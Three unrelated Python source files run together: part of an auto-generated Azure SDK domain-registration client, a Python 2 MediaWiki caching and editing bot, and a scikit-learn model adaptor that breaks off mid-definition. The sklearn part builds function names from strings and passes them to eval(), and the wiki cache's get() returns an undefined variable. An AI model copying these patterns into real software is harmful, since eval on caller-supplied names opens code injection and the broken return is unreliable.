'/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements') path_format_arguments = { "name": _SERIALIZER.url("name", name, 'str'), "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'), } url = _format_url_section(url, **path_format_arguments) # Construct parameters query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str') # Construct headers header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] if content_type is not None: header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') return HttpRequest( method="POST", url=url, params=query_parameters, headers=header_parameters, json=json, content=content, **kwargs ) class TopLevelDomainsOperations(object): """TopLevelDomainsOperations operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.web.v2020_09_01.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config @distributed_trace def list( self, **kwargs: Any ) -> Iterable["_models.TopLevelDomainCollection"]: """Get all top-level domains supported for registration. Description for Get all top-level domains supported for registration. :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either TopLevelDomainCollection or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TopLevelDomainCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.TopLevelDomainCollection"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: request = build_list_request( subscription_id=self._config.subscription_id, template_url=self.list.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_request( subscription_id=self._config.subscription_id, template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("TopLevelDomainCollection", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return ItemPaged( get_next, extract_data ) list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains'} # type: ignore @distributed_trace def get( self, name: str, **kwargs: Any ) -> "_models.TopLevelDomain": """Get details of a top-level domain. Description for Get details of a top-level domain. :param name: Name of the top-level domain. :type name: str :keyword callable cls: A custom type or function that will be passed the direct response :return: TopLevelDomain, or the result of cls(response) :rtype: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomain :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.TopLevelDomain"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) request = build_get_request( name=name, subscription_id=self._config.subscription_id, template_url=self.get.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('TopLevelDomain', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}'} # type: ignore @distributed_trace def list_agreements( self, name: str, agreement_option: "_models.TopLevelDomainAgreementOption", **kwargs: Any ) -> Iterable["_models.TldLegalAgreementCollection"]: """Gets all legal agreements that user needs to accept before purchasing a domain. Description for Gets all legal agreements that user needs to accept before purchasing a domain. :param name: Name of the top-level domain. :type name: str :param agreement_option: Domain agreement options. :type agreement_option: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomainAgreementOption :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either TldLegalAgreementCollection or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TldLegalAgreementCollection] :raises: ~azure.core.exceptions.HttpResponseError """ content_type = kwargs.pop('content_type', "application/json") # type: Optional[str] cls = kwargs.pop('cls', None) # type: ClsType["_models.TldLegalAgreementCollection"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: _json = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption') request = build_list_agreements_request( name=name, subscription_id=self._config.subscription_id, content_type=content_type, json=_json, template_url=self.list_agreements.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: _json = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption') request = build_list_agreements_request( name=name, subscription_id=self._config.subscription_id, content_type=content_type, json=_json, template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("TldLegalAgreementCollection", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) return pipeline_response return ItemPaged( get_next, extract_data ) list_agreements.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements'} # type: ignore
import os import datetime import heapq import itertools import collections import gevent import requests from gevent.event import AsyncResult, Event from gevent.queue import Queue, Empty from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker import sqlalchemy.exc import yaml try: import xml.etree.cElementTree as ElementTree except ImportError: import xml.etree.ElementTree as ElementTree from gwikibot import cacheschema from gwikibot import monkey monkey.patch() class PageProxy(object): """A page in a wiki The page may not be loaded when this object is created; accessing its attributes may block. A page is true in a boolean context if it exists on the wiki. (Note that the usage in a bool context may also block.) """ def __init__(self, cache, title): self.title = title self.cache = cache self._result = AsyncResult() self.edits = {} def _set_result(self, contents, page_info): self._contents = contents self.page_info = page_info self._result.set() @property def contents(self): """Return true if the page exists on the wiki""" self._result.get() return self._contents @property def exists(self): """Return true if the page exists on the wiki""" return self.contents is not None @property def text(self): """Return the contents of the page; raise ValueError if page missing""" self._result.get() if self.exists: return self.contents else: raise ValueError('Page does not exist') def __bool__(self): return self.exists __nonzero__ = __bool__ def edit(self, text, section=None): self._result.get() if not self.page_info['edittoken']: raise ValueError('This Page is not editable') else: self.edits[section] = text EditRequest(self.cache, self).go() class WikiCache(object): """A cache of a MediaWiki :param url_base: Base URL of the MediaWiki API, e.g. 'http://en.wikipedia.org/w/api.php' :param db_path: Path to a SQLite file holding the cache, or SQLAlchemy database URL. If not given, a file next to the wikicache module will be used. :param limit: The cache will not make more than one request each `limit` seconds. Use the cache as a dictionary: ``cache[page_title]`` will give you a PageProxy object. """ def __init__( self, url_base, db_url=None, force_sync=False, limit=5, verbose=False): self.verbose = verbose if db_url is None: db_url = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'wikicache.sqlite') self.db_url = db_url if '://' not in db_url: db_url = os.path.abspath(db_url) db_url = 'sqlite:///' + db_url self._engine = create_engine(db_url) self._make_session = sessionmaker(bind=self._engine) self._url_base = url_base self.limit = limit self.request_queue = Queue(0) self._updated = Event() self._loop = gevent.spawn(self._request_loop, force_sync) def request(self, req): if self._loop.ready(): self.log('Restarting request loop') self._loop = gevent.spawn(self._request_loop) self._updated.wait() if req: self.request_queue.put(req) def get_wiki(self): """Get the wiki object, creating one if necessary""" session = self._make_session() query = session.query(cacheschema.Wiki).filter_by( url_base=self._url_base) try: wiki = query.one() except (sqlalchemy.exc.OperationalError, sqlalchemy.orm.exc.NoResultFound): cacheschema.metadata.create_all(self._engine) wiki = cacheschema.Wiki() wiki.url_base = self._url_base wiki.sync_timestamp = None session.add(wiki) session.commit() wiki.session = session return wiki def log(self, string): """Log a message""" # TODO: Something more fancy if self.verbose: print string def _sleep_seconds(self): """Number of seconds to sleep until next request""" now = lambda: datetime.datetime.today() try: next_time = self._next_request_time except AttributeError: return 0 else: sleep_seconds = (next_time - now()).total_seconds() if sleep_seconds > 0: return sleep_seconds else: return 0 def _sleep_before_request(self): """Sleep before another request can be made The request rate is controlled by the "limit" attribute """ sleep_seconds = self._sleep_seconds() if sleep_seconds > 0: self.log('Sleeping %ss' % sleep_seconds) gevent.sleep(sleep_seconds) def _apirequest_raw(self, **params): """Raw MW API request; returns Requests response""" self._sleep_before_request() try: self.log('POST {} {}'.format(self._url_base, params)) result = requests.post(self._url_base, data=params, stream=True) result.raise_for_status() return result finally: self._next_request_time = (datetime.datetime.today() + datetime.timedelta(seconds=self.limit)) def apirequest(self, **params): """MW API request; returns result dict""" params['format'] = 'yaml' return yaml.safe_load(self._apirequest_raw(**params).text) def update(self, force_sync=False): """Fetch a batch of page changes from the server""" wiki = self.get_wiki() if wiki.last_update and not force_sync: thresh = datetime.datetime.today() - datetime.timedelta(minutes=5) if wiki.last_update > thresh: self.log('Skipping update (last update was {})'.format( wiki.last_update)) return if wiki.sync_timestamp is None: self.log('Initial cache setup') feed = self.apirequest(action='query', list='recentchanges', rcprop='timestamp', rclimit=1) last_change = feed['query']['recentchanges'][0] wiki.sync_timestamp = last_change['timestamp'] wiki.synced = True self.invalidate_cache(wiki) wiki.session.commit() else: self.log('Updating cache') feed = self.apirequest(action='query', list='recentchanges', rcprop='title|user|timestamp', rclimit=100, rcend=wiki.sync_timestamp ) sync_timestamp = feed['query']['recentchanges'][0]['timestamp'] while feed: invalidated = set() changes = feed['query']['recentchanges'] for change in changes: title = change['title'] if title not in invalidated: self.log(u'Change to {0} by {1}'.format(title, change['user'])) obj = self._page_object(wiki, title) obj.last_revision = None invalidated.add(title) wiki.session.commit() try: feed = self.apirequest(action='query', list='recentchanges', rcprop='title|user|timestamp', rclimit=100, rcend=wiki.sync_timestamp, **feed['query-continue']['recentchanges'] ) except KeyError: feed = None wiki.sync_timestamp = sync_timestamp wiki.synced = True else: wiki.synced = False wiki.session.commit() wiki.last_update = datetime.datetime.today() wiki.session.commit() def _page_query(self, wiki): """Return a SQLA query for pages on this wiki""" return wiki.session.query(cacheschema.Page).filter_by(wiki=wiki) def _page_object(self, wiki, title): """Get an object for the page 'title', *w/o* adding it to the session """ title = self.normalize_title(title) obj = wiki.session.query(cacheschema.Page).get((self._url_base, title)) if obj: return obj else: obj = cacheschema.Page() obj.wiki = wiki obj.title = title obj.revision = None obj.last_revision = None return obj def _request_loop(self, force_sync=False): """The greenlet that requests needed metadata/pages """ self.update(force_sync=force_sync) self._updated.set() requests = {} while True: self.log('Request loop active') self.update() while True: while not self.request_queue.empty(): self.request_queue.get().insert_into(requests) gevent.sleep(0) try: request = self.request_queue.get( timeout=self._sleep_seconds()) except Empty: break else: request.insert_into(requests) request_list = [(k, v) for k, v in requests.items() if v] request_list.sort(key=lambda k_v: -len(k_v[1])) requests = dict(request_list) if request_list: for k, v in request_list[0][1].items(): v.run(requests) break if not request_list: self._sleep_before_request() if self.request_queue.empty(): self._updated.clear() self.log('Request loop exiting') return def invalidate_cache(self, wiki): """Invalidate the entire cache This marks all articles for re-downloading when requested. Note that articles with a current revision ID will not be re-downloaded entirely, only their metadata will be queried. (To clear the cache entirely, truncate the articles table.) """ self._page_query(wiki).update({'last_revision': None}) wiki.session.commit() def normalize_title(self, title): # TODO: http://www.mediawiki.org/wiki/API:Query#Title_normalization title = title.replace('_', ' ') title = title.replace('\n', '') return title[0].upper() + title[1:] def get(self, title, follow_redirect=False): """Return a page from this cache :param follow_redirect: If True, a Mediawiki redirect will be followed once. """ title = self.normalize_title(title) if follow_redirect: try: return self[self.redirect_target(title)] except KeyError: pass if not title: return default result = PageProxy(self, title) gevent.spawn(self._read, result) return result def _read(self, result, token_requests=()): """Greenlet to fill a PageProxy object Submits work to the queues until a page is fully fetched from the server, then sets the PageProxy result to unblock the consumer """ self.request(None) wiki = self.get_wiki() title = result.title obj = self._page_object(wiki, title) wiki.session.add(obj) wiki.session.commit() # Make sure we know the page's last revision # This is a loop with rollbacks in it, since the DB can change under us while True: # Fetch metadata to see if the page has changed (or is empty!) if obj.last_revision is None or (not obj.up_to_date and obj.contents is None) or token_requests: self.log('Requesting metadata for {}'.format(title)) page_info = MetadataRequest(self, title, token_requests).go() else: page_info = {} # Now, if metadata says we're out of date, actually fetch the page wiki.session.refresh(obj) if not obj.up_to_date: self.log('Requesting page {}'.format(title)) PageRequest(self, title).go() # If everything was successful, notify the caller! wiki.session.refresh(obj) if obj.up_to_date: result._set_result(obj.contents, page_info) wiki.session.rollback() return def __getitem__(self, title): """Return the content of a page, if it exists, or raise KeyError """ return self.get(title) def get_editable(self, title): title = self.normalize_title(title) result = PageProxy(self, title) gevent.spawn(self._read, result, ['edit']) return result class Request(object): """A request to the remote server Requests can be grouped together by a "group key". All requests with the same group key can be gotten with the same API request. The cache's request-loop will take requests, and as soon as there's enough of them for an an API request, it does that request. If there's not enough requests for a while, it fires an "incomplete" request. """ limit = 50 def __init__(self, cache): self.cache = cache self.result = AsyncResult() self._subordinates = [] def go(self): """Schedule the request and block until it's done""" self.cache.request(self) return self.result.get() def insert_into(self, all_requests): """Insert this request into the given dict Run this from the request-loop greenlet; it can do the actual API request if enough requests have accumulated. How many are needed is specified in the "limit" variable. """ peers = all_requests.setdefault(self.group_key, {}) try: master = peers[self.key] except KeyError: peers[self.key] = self else: master._subordinates.append(self) if len(peers) >= self.limit: self.run(all_requests) @property def group_key(self): return (self, ) @property def key(self): return self def run(self, all_requests): pass def _all_finished_requests(self, all_requests, key): master = all_requests.get(self.group_key, {}).pop(key, None) if master: yield master for s in master._subordinates: yield s def powerset(iterable): "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)" s = list(iterable) return itertools.chain.from_iterable( itertools.combinations(s, r) for r in range(len(s)+1)) class MetadataRequest(Request): limit = 100 def __init__(self, cache, title, token_requests): super(MetadataRequest, self).__init__(cache) self.title = title self.token_requests = tuple(sorted(token_requests)) self.result = AsyncResult() @property def group_key(self): return MetadataRequest, self.token_requests @property def key(self): return self.title def _all_finished_requests(self, all_requests, key): # A bit more complicated since we can mark all requests with a subset # of our tokens as done mdr, token_requests = self.group_key for subset in powerset(token_requests): peers = all_requests.get((MetadataRequest, subset), {}) master = peers.pop(key, None) if master: yield master for s in master._subordinates: yield s def run(self, all_requests): wiki = self.cache.get_wiki() titles = all_requests[self.group_key].keys() # TODO: Fill up request if we can fetch more kwargs = dict( action='query', info='lastrevid', prop='revisions', # should not be necessary on modern MW titles='|'.join(titles) ) if self.token_requests: kwargs['prop'] += '|info' kwargs['intoken'] = '|'.join(self.token_requests) result = self.cache.apirequest(**kwargs) assert 'normalized' not in result['query'], ( result['query']['normalized']) # XXX: normalization fetched_titles = [] for page_info in result['query'].get('pages', []): title = page_info['title'] page = self.cache._page_object(wiki, title) wiki.session.add(page) if 'missing' in page_info: page.last_revision = 0 page.revision = 0 page.contents = None else: revid = page_info['revisions'][0]['revid'] # revid = page_info['lastrevid'] # for the modern MW page.last_revision = revid for p in self._all_finished_requests(all_requests, title): p.result.set(page_info) wiki.session.commit() class PageRequest(Request): def __init__(self, cache, title): super(PageRequest, self).__init__(cache) self.title = title @property def group_key(self): return (PageRequest,) @property def key(self): return self.title def run(self, all_requests): wiki = self.cache.get_wiki() titles = all_requests[self.group_key].keys() dump = self.cache._apirequest_raw(action='query', export='1', exportnowrap='1', titles='|'.join(titles)).raw tree = ElementTree.parse(dump) for elem in tree.getroot(): tag = elem.tag if tag.endswith('}siteinfo'): continue elif tag.endswith('}page'): revision, = (e for e in elem if e.tag.endswith('}revision')) pagename, = (e for e in elem if e.tag.endswith('}title')) text, = (e for e in revision if e.tag.endswith('}text')) revid, = (e for e in revision if e.tag.endswith('}id')) title = pagename.text page = self.cache._page_object(wiki, title) page.last_revision = int(revid.text) page.revision = int(revid.text) page.contents = text.text wiki.session.add(page) for p in self._all_finished_requests(all_requests, title): p.result.set() else: raise ValueError(tag) wiki.session.commit() class SingleRequest(Request): """A request that can't be combined with others A SingleRequest is run as soon as it's picked up from the request queue. """ limit = 1 def insert_into(self, all_requests): self.run(all_requests) class EditRequest(SingleRequest): def __init__(self, cache, pageproxy): super(EditRequest, self).__init__(cache) self.pageproxy = pageproxy self.title = pageproxy.title self.edittoken = pageproxy.page_info['edittoken'] self.starttimestamp = pageproxy.page_info['starttimestamp'] def run(self, all_requests): pageproxy = self.pageproxy edits = pageproxy.edits if not edits: return revid = None wiki = self.cache.get_wiki() page = self.cache._page_object(wiki, self.title) page.last_revision = None wiki.session.commit() whole_page_edit = edits.pop(None) if (whole_page_edit is not None and (pageproxy.contents is None or whole_page_edit != pageproxy.contents)): self.do_edit(None, whole_page_edit) for section, text in edits.items(): self.do_edit(section, text) self.result.set() def do_edit(self, section, text): kwargs = dict( action='edit', title=self.title, text=text, token=self.edittoken, summary='gwikibot edit', # TODO minor=False, # TODO bot=True, # TODO starttimestamp=self.starttimestamp, # TODO: recreate, createonly, nocreate ) if section is not None: kwargs['section'] = section result = self.cache.apirequest(**kwargs) revid = result['edit']['newrevid'] self.starttimestamp = result['edit']['newtimestamp']
"""Integrating sklearn in our clumsy framework, the clumsy way. How to add a new model: - Identify SKLearn class - Add it to the Scikit2Short dictionary - Create a shortName_default_params() and a shortName_nonid_params() method To instantiate: sk_factory(skclass) or sk_factory(shortName) """ #TODO GLMnet #TODO: SS, NaiveBayes, LDA/QDA from collections import OrderedDict from sklearn.base import BaseEstimator from oscail.common.config import Configurable, Configuration from rdkit.ML.NaiveBayes.ClassificationModel import NaiveBayesClassifier from sklearn.ensemble import GradientBoostingClassifier, GradientBoostingRegressor, RandomForestRegressor, \ ExtraTreesClassifier, ExtraTreesRegressor from sklearn.ensemble.forest import RandomForestClassifier import numpy as np from sklearn.gaussian_process.gaussian_process import MACHINE_EPSILON from sklearn.linear_model.ridge import Ridge from sklearn.linear_model import Lasso, ElasticNet, Lars, OrthogonalMatchingPursuit, BayesianRidge, \ ARDRegression, LogisticRegression, SGDClassifier, SGDRegressor, Perceptron, LassoLars, LinearRegression from sklearn.naive_bayes import GaussianNB from sklearn.svm import SVC, NuSVC, LinearSVC, SVR, NuSVR from sklearn.neighbors import KNeighborsClassifier, RadiusNeighborsClassifier, \ KNeighborsRegressor, RadiusNeighborsRegressor, NearestCentroid from sklearn.gaussian_process import GaussianProcess from sklearn.cross_decomposition import PLSRegression, PLSCanonical, CCA, PLSSVD from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor Scikit2Short = { #Ensembles RandomForestClassifier: 'rfc', RandomForestRegressor: 'rfr', GradientBoostingClassifier: 'gbc', GradientBoostingRegressor: 'gbr', ExtraTreesClassifier: 'etc', ExtraTreesRegressor: 'etr', #NaiveBayes NaiveBayesClassifier: 'nb', # TODO: parameters GaussianNB: 'gnb', #GLMs Ridge: 'ridge', Lasso: 'lasso', ElasticNet: 'elnet', Lars: 'lars', OrthogonalMatchingPursuit: 'omp', BayesianRidge: 'bayridge', ARDRegression: 'ardr', LogisticRegression: 'logreg', SGDClassifier: 'sgdc', SGDRegressor: 'sgdr', Perceptron: 'perceptron', LassoLars: 'lassolars', LinearRegression: 'lr', #Support Vector Machines SVC: 'svc', NuSVC: 'nusvc', LinearSVC: 'linsvc', SVR: 'svr', NuSVR: 'nusvr', #NearestNeighbours KNeighborsClassifier: 'knc', RadiusNeighborsClassifier: 'rnc', KNeighborsRegressor: 'knr', RadiusNeighborsRegressor: 'rnr', NearestCentroid: 'nc', #Gaussian Processes GaussianProcess: 'gp', #Partial Least Squares PLSRegression: 'plsr', PLSCanonical: 'plscan', CCA: 'cca', PLSSVD: 'plssvd', #Decision Trees DecisionTreeClassifier: 'dtc', DecisionTreeRegressor: 'dtr' } Short2Scikit = dict((v, k) for k, v in Scikit2Short.iteritems()) class ScikitAdaptor(BaseEstimator, Configurable): def __init__(self, skclassifier=RandomForestClassifier(random_state=0), configuration_dict=None, non_id_params=(), short_name=None, **kwargs): super(ScikitAdaptor, self).__init__() self.classifier = skclassifier self.configuration_dict = configuration_dict if configuration_dict else skclassifier.get_params() self.non_id_params = non_id_params self.short_name = short_name if short_name else \ Scikit2Short.get(self.classifier.__class__, self.classifier.__class__.__name__) def configuration(self): return Configuration(name=self.short_name, configuration_dict=self.configuration_dict, non_id_keys=self.non_id_params) def fit(self, X, y): return self.train(X, y) def train(self, X, y): classifier = self.classifier.fit(X, y) if not classifier: classifier = self.classifier self.classifier = classifier return self def score(self, X): return self.scores(X)[:, 1] def scores(self, X): try: scores = self.classifier.predict_proba(X) # TODO: some have methods with further refinements, # like allowing to use a subset of classifiers in ensembles except: # (AttributeError, TypeError) scores = self.classifier.predict(X) if scores.ndim < 2: scores2 = np.zeros((len(scores) if isinstance(scores, np.ndarray) else 1, 2)) # FIXME: isinstance is slow scores2[:, 1] = scores # ATM, target class = 1 return scores2 return scores def predict_proba(self, X): return self.scores(X) def get_skl_default_params(short_name): return eval('%s_default_params()' % short_name) def sk_wrapper(skclass, configuration_dict=None, non_ids=None): if isinstance(skclass, str): skclass = Short2Scikit[skclass] short_name = Scikit2Short[skclass] if not configuration_dict: configuration_dict = eval('%s_default_params()' % short_name) if not non_ids: non_ids = eval('%s_nonid_params()' % short_name) return skclass(**configuration_dict), configuration_dict, non_ids, short_name def skl_factory(skclass, configuration_dict=None): return ScikitAdaptor(*sk_wrapper(skclass, configuration_dict=configuration_dict)) ########################## #Configuration (ID stuff) #We usually avoid introspection to get finer control on the parameters order and defaults ########################## ######RandomForests def rfc_default_params(): return OrderedDict(( ('n_estimators', 10), ('criterion', 'gini'), ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', 'auto'), ('bootstrap', True), ('compute_importances', False), ('oob_score', False), ('n_jobs', 1), ('random_state', 0), ('verbose', 0))) def rfc_nonid_params(): return 'verbose', 'n_jobs' # OOB, importances change the internal representation of the classifier def rfr_default_params(): params = rfc_default_params() params['criterion'] = 'mse' return params def rfr_nonid_params(): return rfc_nonid_params() ######GradientBoosting def gbc_default_params(): return OrderedDict(( ('learn_rate', 0.1), ('loss', 'deviance'), # Or 'ls' or 'lad' for regression ('subsample', 1.0), ('n_estimators', 100), #DecisionTree params ('min_samples_split', 1), ('min_samples_leaf', 1), ('max_depth', 3), #Rng ('random_state', 0))) def gbc_nonid_params(): return () def gbr_default_params(): params = gbc_default_params() params['loss'] = 'ls' return params def gbr_nonid_params(): return () ######Extremely Randomized Trees Classifier def etc_default_params(): return OrderedDict(( ('n_estimators', 10), ('criterion', 'gini'), # or 'entropy' ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', 'auto'), # or 'sqrt' or 'log2' or 'none' ('bootstrap', False), # whether bootstrap samples are used when building trees ('compute_importances', True), ('oob_score', False), # whether to use out-of-bag samples to estimate the generalization error ('n_jobs', 1), ('random_state', 0), ('verbose', 0) )) def etc_nonid_params(): return 'n_jobs', 'verbose' # 'compute_importances' ######Extremely Randomized Trees Regressor def etr_default_params(): return OrderedDict(( ('n_estimators', 10), ('criterion', 'mse'), ('max_depth', None), ('min_samples_split', 1), ('min_samples_leaf', 1), ('min_density', 0.1), ('max_features', 'auto'), ('bootstrap', False), ('compute_importances', True), ('oob_score', False), ('n_jobs', 1), ('random_state', None), ('verbose', 0) )) def etr_nonid_params(): return 'compute_importances', 'n_jobs', 'verbose' ############################### # Generalized Linear Models ############################### # TODO: glmnet (e.g. in MDP) ############################### ######Ridge def ridge_default_params(): return OrderedDict(( ('alpha', 1.0), ('fit_intercept', True), ('normalize', False), ('copy_X', True), ('tol', 1e-3) )) def ridge_nonid_params(): return 'copy_X' ######Lasso def lasso_default_params(): return OrderedDict(( ('alpha', 1.0), ('fit_intercept', True), ('normalize', False), ('precompute', 'auto'), ('copy_X', True), ('max_iter', 1000), ('tol', 1e-4), ('warm_start', False), ('positive', False) )) def lasso_nonid_params(): return 'copy_X' ######ElasticNet def elnet_default_params(): return OrderedDict(( ('alpha', 1.0), # constant that multiplies the penalty term ('rho', 0.5), # For rho = 0 the penalty is an L1 penalty. For rho = 1 it is an L2 penalty. # For 0 < rho < 1, the penalty is a combination of L1 and L2 ('fit_intercept', True), ('normalize', False), ('precompute', 'auto'), ('max_iter', 1000), ('copy_X', True), ('tol', 1e-4), ('warm_start', False), ('positive', False) )) def elnet_nonid_params(): return 'copy_X' ######LeastAngleRegression #TODO check Lasso_path def lars_default_params(): return OrderedDict(( ('n_nonzero_coefs', 500), ('fit_intercept', True), ('verbose', False), ('normalize', True), ('precompute', 'auto'), ('copy_X', True), ('eps', np.finfo(np.float).eps) # The machine-precision regularization in the computation of the # Cholesky diagonal factors. )) def lars_nonid_params(): return 'verbose', 'copy_X' ######OrthogonalMatchingPursuit def omp_default_params(): return OrderedDict(( ('n_nonzero_coefs', None), ('tol', None), ('fit_intercept', True), ('normalize', True), ('precompute_gram', False), ('copy_X', True), ('copy_Gram', True), ('copy_Xy', True) )) def omp_nonid_params(): return 'copy_X', 'copy_Xy', 'copy_Gram' ######BayesianRidge regression def bayridge_default_params(): return OrderedDict(( ('n_iter', 300), ('tol', 1.e-3), ('alpha_1', 1e-6), # shape parameter for the Gamma distribution prior over the alpha parameter. ('alpha_2', 1e-6), # inverse scale parameter (rate parameter) for the Gamma distribution prior # over the alpha parameter ('lambda_1', 1e-6), # shape parameter for the Gamma distribution prior over the lambda parameter ('lambda_2', 1e-6), # inverse scale parameter (rate parameter) for the Gamma distribution prior # over the lambda parameter ('compute_score', False), ('fit_intercept', True), ('normalize', False), ('copy_X', True), ('verbose', False) )) def bayridge_nonid_params(): return 'copy_X', 'verbose' ######ARDRegression def ardr_default_params(): return OrderedDict(( ('n_iter', 300), ('tol', 1e-3), ('alpha_1', 1e-6), ('alpha_2', 1e-6), ('lambda_1', 1e-6), ('lambda_2', 1e-6), ('compute_score', False), ('threshold_lambda', 1e+4), ('fit_intercept', True), ('normalize', False), ('copy_X', True), ('verbose', False) )) def ardr_nonid_params(): return 'copy_X', 'verbose' ######LogisticRegression def logreg_default_params(): return OrderedDict(( ('penalty', 'l2'), ('dual', False), ('tol', 1e-4), ('C', 1.0), # Specifies the strength of the regularization. The smaller it is the bigger in the regularization. # If None then C is set to n_samples. ('fit_intercept', True), ('intercept_scaling', 1), ('class_weight', None), ('random_state', 0), )) def logreg_nonid_params(): return () ######SGDRegression def sgdr_default_params(): return OrderedDict(( ('loss', 'squared_loss'), ('penalty', 'l2'), ('alpha', 0.0001), # Constant that multiplies the regularization term ('rho', 0.85), # The Elastic Net mixing parameter, with 0 < rho <= 1. ('fit_intercept', True), ('n_iter', 5), ('shuffle', False), # Whether or not the training data should be shuffled after each epoch ('verbose', 0), ('p', 0.1), # Epsilon in the epsilon-insensitive huber loss function ('seed', 0), # seed to use when shuffling the data ('learning_rate', 'invscaling'), ('eta0', 0.01), # initial learning rate ('power_t', 0.25), # The exponent for inverse scaling learning rate ('warm_start', False), )) def sgdr_nonid_params(): return 'verbose' ######SGDClassification def sgdc_default_params(): return OrderedDict(( ('loss', 'hinge'), ('penalty', 'l2'), ('alpha', 0.0001), ('rho', 0.85), ('fit_intercept', True), ('n_iter', 5), ('shuffle', False), ('verbose', 0), ('n_jobs', 1), ('seed', 0), ('learning_rate', 'optimal'), ('eta0', 0.0), ('power_t', 0.5), ('class_weight', None), ('warm_start', False) )) def sgdc_nonid_params(): return 'verbose', 'n_jobs' ######Perceptron def perceptron_default_params(): return OrderedDict(( ('penalty', None), ('alpha', 0.0001), ('fit_intercept', True), ('n_iter', 5), ('shuffle', False), ('verbose', 0), ('eta0', 1.0), ('n_jobs', 1), ('seed', 0), ('class_weight', None), ('warm_start', False) )) def perceptron_nonid_params(): return 'verbose', 'n_jobs' ######LassoLars def lassolars_default_params(): return OrderedDict(( ('alpha', 1.0), ('fit_intercept', True), ('verbose', False), ('normalize', True), ('precompute', 'auto'), ('max_iter', 500), ('eps', np.finfo(np.float).eps), ('copy_X', True) )) def lassolars_nonid_params(): return 'verbose', 'copy_X' ######LinearRegression def lr_default_params(): return OrderedDict(( ('fit_intercept', True), ('normalize', False), ('copy_X', True) )) def lr_nonid_params(): return 'copy_X' ############################### # Support Vector Marchines ############################### ######SVC def svc_default_params(): return OrderedDict(( ('C', None), ('kernel', 'rbf'), # It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' ('degree', 3.0), # Only significant if polykernel or sigmoid kernel are used ('gamma', 0.0), # Kernel coefficient for 'rbf' and 'poly'. # If gamma is 0.0 then 1/n_features will be used instead ('coef0', 0.0), # Only significant if polykernel or sigmoid kernel are used ('probability', False), 